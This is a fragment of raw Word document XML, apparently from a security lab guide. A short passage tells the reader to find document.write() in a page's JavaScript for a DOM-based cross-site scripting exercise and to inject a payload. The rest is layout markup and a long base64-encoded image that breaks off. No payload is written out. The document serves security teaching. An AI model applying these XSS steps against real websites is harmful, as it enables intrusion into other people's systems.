        <w:t xml:space="preserve"> → Cross-Site Scripting (DOM) module. Inspect the page source/JavaScript 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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()).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 payload in the vulnerable parameter and observe execution without any server round-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C954D4" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="220" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00953AA4">
          <w:pgSz w:w="11910" w:h="16850"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C82687" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="8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9504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C3817EF" wp14:editId="7EFAE5BE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729" y="1316726"/>
                            <a:ext cx="4692783" cy="2658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729" y="4509442"/>
                            <a:ext cx="4738253" cy="3120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9531B4" id="Group 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:19pt;margin-top:19pt;width:557.5pt;height:804.35pt;z-index:-15806976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yDWi5MCAABcCQAADgAAAGRycy9lMm9Eb2MueG1s5Fbb&#10;btwgEH2v1H9AvCe+27tWdvOSJooUtatePoDF2EYxBgF7+/sO2HGS3UiporZK1QejwcBw5swZ4OJy&#10;Lzq0Zdpw2S9wdB5ixHoqK943C/zj+/XZDCNjSV+RTvZsgQ/M4Mvlxw8XO1WyWLayq5hG4KQ35U4t&#10;cGutKoPA0JYJYs6lYj0M1lILYqGrm6DSZAfeRRfEYZgHO6krpSVlxsDfq2EQL73/umbUfqlrwyzq&#10;FhiwWd9q365dGywvSNloolpORxjkDSgE4T1sOrm6IpagjeYnrgSnWhpZ23MqRSDrmlPmY4BoovAo&#10;mhstN8rH0pS7Rk00AbVHPL3ZLf28vdHqm1rpAT2Yd5LeG+Al2KmmfDru+s3j5H2thVsEQaC9Z/Qw&#10;Mcr2FlH4WYSzMM6AeApjURhHWZxmA+m0hcycLKTtp9eWBqQctvYAJ0CK0xK+kSSwTkh6XUywym40&#10;w6MT8Us+BNH3G3UG+VTE8jXvuD14bULmHKh+u+LU8es6wOdKI14tcIpRTwSUxK0gDUOpY+Vhhpvv&#10;MnCyfN1xdc27zvHu7BEoCPpIEC/EOojtStKNYL0dqkezDjDL3rRcGYx0ycSaATh9W0WQNKhcCwiV&#10;5r0dsmasZpa2bv8acHyFAnNASTkNeNCPOF0IZpTXkWKiKAmLeI6R00YS5UWcD5s8qCfN53ExSwb1&#10;xHk2K5LEzZgUQEqljb1hUiBnAG7AA7STkmzvzIjsYcrI5wDGowRsA+dg/DO6yZ7rxleTI9kp6z3o&#10;Jv6rukmzcJ6m8ZFuimQWZ6NukigOi6L473WTP9eNL7X3pBuXrj973sA19NINVcwLENB0Q6V5Ovvt&#10;YvFXFVzh/uwanxvujfC0D/bTR9HyJwAAAP//AwBQSwMECgAAAAAAAAAhAENj7OJAtQAAQLUAABUA&#10;AABkcnMvbWVkaWEvaW1hZ2UxLmpwZWf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMD&#10;AwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/b&#10;AEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFP/AABEIAXgCQ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&#10;oP8AiTeEO+PEUH/oievMF+6K9P